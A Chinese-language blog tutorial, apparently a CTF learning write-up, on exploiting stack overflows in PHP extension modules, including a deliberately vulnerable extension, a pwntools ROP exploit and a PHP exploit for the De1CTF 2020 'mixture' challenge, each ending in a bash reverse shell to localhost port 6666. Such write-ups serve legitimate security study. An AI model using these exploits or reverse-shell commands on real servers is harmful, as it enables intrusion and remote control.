webpwn学习

字数统计: 3k字   |   阅读时长≈ 12分

WebPwn的入门学习,很多知识都是搬运的各个师傅。如果引用有所不对的地方,请多多包含。

基础知识

WebPHP介绍

Webpwn目前大多数针对的是Php,我们需要重点分析的是 PHP 加载的外部拓展,漏洞点通常在 so拓展库中。由于 php加载扩展库来调用其内部函数,所以和常规 PWN题最大的不同点,就是我们不能直接获得交互式的shell。这里通常是需要采用 popen或者 exec函数族来进行执行 bash命令来反弹 shell,直接执行 one_gadget或者 system是不可行的。

PHP拓展介绍

Linux环境下,PHP 拓展通常为 .so文件,拓展模块放置的路径可以通过如下方式查看:

1
$> php -i | grep -i extension_dir

拓展模块的生命周期如下:

  1. Module init 即 MINIT

PHP 解释器启动,加载相关模块,在此时调用相关模块的 MINIT 方法,仅被调用一次

  1. Request init 即 RINIT

每个请求到达时都被触发,SAPI层将控制权交由 PHP 层,PHP 初始化本次请求执行脚本所需的环境变量,函数列表等,调用所有模块的 RINIT 函数

  1. Request shutdown 即 RSHUTDOWN

请求结束,PHP 就会自动清理程序,顺序调用各个模块的 RSHUTDOWN 方法,清除程序运行期间的符号表

  1. Module shutdown 即 MSHUTDOWN

服务器关闭,PHP调用各个模块的MSHUTDOWN方法释放内存

PHP的生命周期包含如下几种:

  • 单进程的 SAPI 生命周期
  • 多进程的SAPI生命周期
  • 多线程的SAPI生命周期

CLI运行模式:

通常我们在开发PHP扩展时,多是用命令行终端来直接使用php解释器直接解释执行.php文件,在.php文件中我们写入需要调用的扩展函数,该扩展函数被编译在.so的扩展模块中,这种运行模式我一般称为CLI模式,该模式对应的php声明周期一般为单进程SAPI生命周期

CGI运行模式:

其中对于大部分网站应用服务器来说,大部分时候PHP解释器运行的模式为CGI模式——单进程SAPI生命周期,此模式运行特点为请求到达时,为每个请求fork一个进程,一个进程只对一个请求做出响应,请求结束后,进程也就结束了。其中fork的进程,和原进程的内存布局一般来说是一模一样的,所以这里如果能拿到/proc/{pid}/maps文件,则可以拿到该进程的内存布局,形成内存泄露,此方式在De1CTF中的这道WEBPWN上是第一个突破点,利用的其有漏洞的包含函数来读取/proc/self/maps,可以拿到所有基地址,从而无视PIE保护。

PHP拓展安装

下面是是 PHP拓展模块的安装流程,以 18.04为例。

首先是安装php,以及Php开发包:

1
sudo apt install php php-dev

然后查看下载的php版本,去此处下载相同版本的php源代码。

源代码目录结构如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
php-7.2.24
  |____build    --和编译有关的目录,里面包括wk,awk和sh脚本用于编译处理,其中m4文件是linux下编译程序自动生成的文件,可以使用buildconf命令操作具体的配置文件。
  |____ext      --扩展库代码,例如Mysql,gd,zlib,xml,iconv 等我们熟悉的扩展库,ext_skel是linux下扩展生成脚本,windows下使用ext_skel_win32.php。
  |____main     --主目录,包含PHP的主要宏定义文件,php.h包含绝大部分PHP宏及PHP API定义。
  |____netware  --网络目录,只有sendmail_nw.h和start.c,分别定义SOCK通信所需要的头文件和具体实现。
  |____pear     --扩展包目录,PHP Extension and Application Repository。
  |____sapi     --各种服务器的接口调用,如Apache,IIS等。
  |____scripts  --linux下的脚本目录。
  |____tests    --测试脚本目录,主要是phpt脚本,由--TEST--,--POST--,--FILE--,--EXPECT--组成,需要初始化可添加--INI--部分。
  |____TSRM     --线程安全资源管理器,Thread Safe Resource Manager保证在单线程和多线程模型下的线程安全和代码一致性。
  |____win32    --Windows下编译PHP 有关的脚本。
  |____Zend     --包含Zend引擎的所有文件,包括PHP的生命周期,内存管理,变量定义和赋值以及函数宏定义等等。

拓展模块的开发

首先进入源代码目录,使用如下目录生成拓展模块的工程项目。该程序会直接为我们生成一个模板。

1
./ext_skel --extname=easy_phppwn

然后我们在生成的模板函数中,添加一个如下所示的拓展函数,其含有一个简单的栈溢出漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
PHP_FUNCTION(easy_phppwn)
{
	char *arg = NULL;
    size_t arg_len, len;
    char buf[100];
    if(zend_parse_parameters(ZEND_NUM_ARGS(), "s", &arg, &arg_len) == FAILURE){
        return;
    }
    memcpy(buf, arg, arg_len);
    php_printf("The baby phppwn.\n");
    return SUCCESS;
}

其中由PHP_FUNCTION宏修饰的函数代表该函数可以直接在php中进行调用,由PHP_RINIT_FUNCTION修饰的函数将在一个新请求到来时被调用,其描述如下

当一个页面请求到来时候,PHP 会迅速开辟一个新的环境,并重新扫描自己的各个扩展,遍历执行它们各自的RINIT 方法(俗称 Request Initialization),这时候一个扩展可能会初始化在本次请求中会使用到的变量等, 还会初始化用户端(即 PHP 脚本)中的变量之类的,内核预置了 PHP_RINIT_FUNCTION() 这个宏函数来帮我们实现这个功能

然后,在代码中还需要有如下配置该拓展函数,将需要在php中调用的函数指针写到一个统一的数组中:

1
2
3
4
5
const zend_function_entry easy_phppwn_funcions[] = {
	PHP_FE(confirm_easy_phppwn_complied, NULL)
	PHP_FE(easy_phppwn, NULL)
	PHP_FE_END
};

然后使用如下命令配置编译

1
2
/usr/bin/phpize
./configure --with-php-config=/usr/bin/php-config

然后在生成的Makefile文件中,在如下位置设置编译参数,记得取消-O2优化,否则会加上FORTIFY保护,导致memcpy函数加上长度检查变为__memcpy_chk函数

1
2
3
4
5
6
7
8
9
10
phpincludedir = /usr/include/php/20170718
CC = cc	
CFLAGS = -g -fno-stack-protector	//取消 -o2
CFLAGS_CLEAN = $(CFLAGS)
CPP = cc -E
CPPFLAGS = -DHAVE_CONFIG_H
CXX =
CXXFLAGS =
CXXFLAGS_CLEAN = $(CXXFLAGS)
EXTENSION_DIR = /usr/lib/php/20170718

随后,可以使用 make指令编译生成拓展模块。新生成的拓展模块会被放在同目录下 ./modules中。然后使用如下命令,找到当前系统安装的php所在的拓展模块路径:

1
php -i | grep -i extension_dir

将新生成的 拓展模块放置在 系统 php的 拓展模块路劲内。

随后找到系统 php.ini路径,在其中增加 如下命令:

1
extension=easy_phppwn.so

完成之后,可以尝试写一个test.php文件,在其中调用 phpinfo()函数,然后可以看到 easy_phppwn已经被加载到系统中:

1
2
3
php test.php | grep easy_phppwn
easy_phppwn
easy_phppwn support => enabled

PHP拓展模块调试

对于php的拓展文件,可以直接使用 ida打开分析,我们只需要重点分析 含有 easy_phppwn的函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
void __cdecl zif_easy_phppwn(zend_execute_data *execute_data, zval *return_value)
{
  char buf[100]; // [rsp+10h] [rbp-80h] BYREF
  size_t n; // [rsp+80h] [rbp-10h] BYREF
  char *arg; // [rsp+88h] [rbp-8h] BYREF

  arg = 0LL;
    //   zend_parse_parameters 是zend引擎解析我们使用php调用改函数时传入的字符串,s代表以字符串的形式解析,&arg是参数的地址,&n是解析后的参数长度
  if ( (unsigned int)zend_parse_parameters(execute_data->This.u2.next, "s", &arg, &n) != -1 )
  {
    memcpy(buf, arg, n);
    php_printf("The baby phppwn.\n");
  }
}

其中 zend_parse_parameters函数是自带的传参函数,由ZEND_PARSE_PARAMETERS_NONE()修饰的代表无参数;而ZEND_PARSE_PARAMETERS_START规定了参数的个数,其定义如下:

1
#define ZEND_PARSE_PARAMETERS_START(min_num_args, max_num_args) ZEND_PARSE_PARAMETERS_START_EX(0, min_num_args, max_num_args)

可以使用 checksec检查 拓展库的保护方式:

1
2
3
4
5
6
7
 checksec ./easy_phppwn.so
[*] '/home/a1exxx/Desktop/CTF/webpwn/easy_phppwn.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

可以开启了 PIENX,所以我们得想办法泄露 libc地址,然后 执行 ROP

我们可以直接使用 gdb php来调试系统的php。而且为了简单,先关掉了本地的随机化。进入 gdb后,可以使用 vmmap来获得 libc和栈地址。然后由于拓展模块有源码,所以可以直接源码调试。

我们的目的是执行 ROP,去执行如下函数:

1
poepn('/bin/bash -c "/bin/bash -i >&/dev/tcp/127.0.0.1/6666 0>&1"','r')

这里有两个参数,一个是 反弹shell的字符串,一个是 r。然后需要知道 poepn函数。

最终exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
context.update(arch='amd64',os='linux',log_level='debug')
context.terminal=(['tmux','split','-h'])

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def create_php(buf):
    with open("pwn.php", 'w+') as pf:
        pf.write('''<?php
easy_phppwn(urldecode("%s"));
?>'''%urlencode(buf))


stack_addr = 0x7ffffffde000
stack_offset = 0x1c658
libc_base = 0x7ffff5e24000
p_rdi_r = 0x215bf + libc_base
p_rsi_r = 0x23eea + libc_base
p_rdx_r = 0x1b96 + libc_base
p_rax_r = 0x43ae8 + libc_base

popen_addr = libc.sym['popen']+libc_base

command = '/bin/bash -c "/bin/bash -i >&/dev/tcp/127.0.0.1/6666 0>&1"'

buf1 = 'a'*0x80
buf = 'b'*0x8+p64(p_rdi_r)+p64(stack_addr+stack_offset+0x48)
buf += p64(p_rsi_r)+p64(stack_offset+stack_addr+0x28)+p64(popen_addr)+'r'+7*b'\x00'
buf = buf.ljust(0x50, b'c')
buf += command.ljust(0x60, b'\x00')+"a"*8
payload = buf1+buf

create_php(payload)

我们在本地另一个终端使用 nc接受shell,如下所示:

1
2
3
nc -lvvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from localhost 51618 received!

2020De1CTF-mixture

这道题前面是 web部分,不做分析。只需要将这道题的 php 拓展按照上述方法加载到本地的php环境中,我们就可以运行这道题的环境。

程序分析

首先分析 拓展库,发现被花指令混淆了,不能直接看伪代码。这里需要先去除花指令。但是由于对逆向掌握太差,去除花指令,这部分主要参考这里。随后,我们正常反汇编:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
void __fastcall zif_Minclude(zend_execute_data *execute_data, zval *return_value)
{
  zval *v2; // r12
  unsigned __int64 v3; // rsi
  FILE *v4; // rbx
  __int64 v5; // rax
  void *src; // [rsp+0h] [rbp-98h]
  size_t n; // [rsp+8h] [rbp-90h]
  char dest; // [rsp+10h] [rbp-88h]
  int v9; // [rsp+70h] [rbp-28h]
  char *v10; // [rsp+74h] [rbp-24h]
  v2 = return_value;
  memset(&dest, 0, 0x60uLL);
  v9 = 0;
  v10 = &dest;
  if ( (unsigned int)zend_parse_parameters(execute_data->This.u2.next, "s", &src, &n) != -1 )
  {
    memcpy(&dest, src, n);
    php_printf("%s", &dest);
    php_printf("<br>", &dest);
    v3 = (unsigned __int64)"rb";
    v4 = fopen(&dest, "rb");
    if ( v4 )
    {
      while ( !feof(v4) )
      {
        v3 = (unsigned int)fgetc(v4);
        php_printf("%c", v3);
      }
      php_printf("\n", v3);
    }
    else
    {
      php_printf("no file\n", "rb");
    }
    v5 = zend_strpprintf(0LL, "True");
    v2->value.lval = v5;
    v2->u1.type_info = (*(_BYTE *)(v5 + 5) & 2u) < 1 ? 5126 : 6;
  }
}

可以看到 memcpy存在一个明显的溢出,dest大小为100,而 src是我们输入的参数。而且这里可以读取任意文件。我们可以通过 /proc/self/maps来泄露地址。

利用分析

通过 Minclude读取 /proc/self/maps文件,来获得 libc地址和 stack地址。不过这里需要用到一个PHP的知识,即 ob函数,我们可以通过 ob_start来打开缓冲区,然后程序的输出流就会被存储到变量中,我们可以使用 ob_get_contents来获得 输出流,然后通过 正则获得 地址。

随后 ROP和上面类似来 getshell

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
$ret = "";
$sys = "";
function s2i($s) {
    $result = 0;
    for ($x = 0;$x < strlen($s);$x++) {
        $result <<= 8;
        $result |= ord($s[$x]);
    }
    return $result;
}

function i2s($i, $x = 8) {
    $re = "";
    for($j = 0;$j < $x;$j++) {
        $re .= chr($i & 0xff);
        $i >>= 8;
    }
    return $re;
}

function callback($buffer){
    global $ret,$sys;
    $pattern1 = '/([0-9a-f]+)\-[0-9a-f]+ .* \/lib\/x86_64-linux-gnu\/libc-2.27.so/';
    $pattern = '/([0-9a-f]+)\-[0-9a-f]+ .*  \[stack\]/';
    preg_match_all($pattern, $buffer, $ret);
    preg_match_all($pattern1, $buffer, $sys);
    return "";
}
$command = '/bin/bash -c "/bin/bash -i >&/dev/tcp/127.0.0.1/6666 0>&1"';
ob_start("callback");
$a="/proc/self/maps";
Minclude($a);
$buffer=ob_get_contents();
ob_end_flush();
callback($buffer);
$stack = hexdec($ret[1][0]);
$libc = hexdec($sys[1][0]);

$payload=str_repeat("a",0x88);
$payload.=i2s($libc+0x215bf);
$payload.=i2s($stack+0x1ca98+0x90).i2s($libc+0x23eea);
$payload.=i2s($stack+0x1ca98+0x28).i2s($libc+0x80a10);
$payload.="r".str_repeat("\x00",0x7).str_repeat("c",0x60);
$payload.=$command.str_repeat("b",0x8);
echo $payload;
Minclude($payload)
?>

在另一个等待连接:

1
2
3
4
nc -lvvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from localhost 51848 received!
/bin/bash: 1bbbbbbbb: ambiguous redirect

参考文献

WEBPWN入门级调试讲解

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing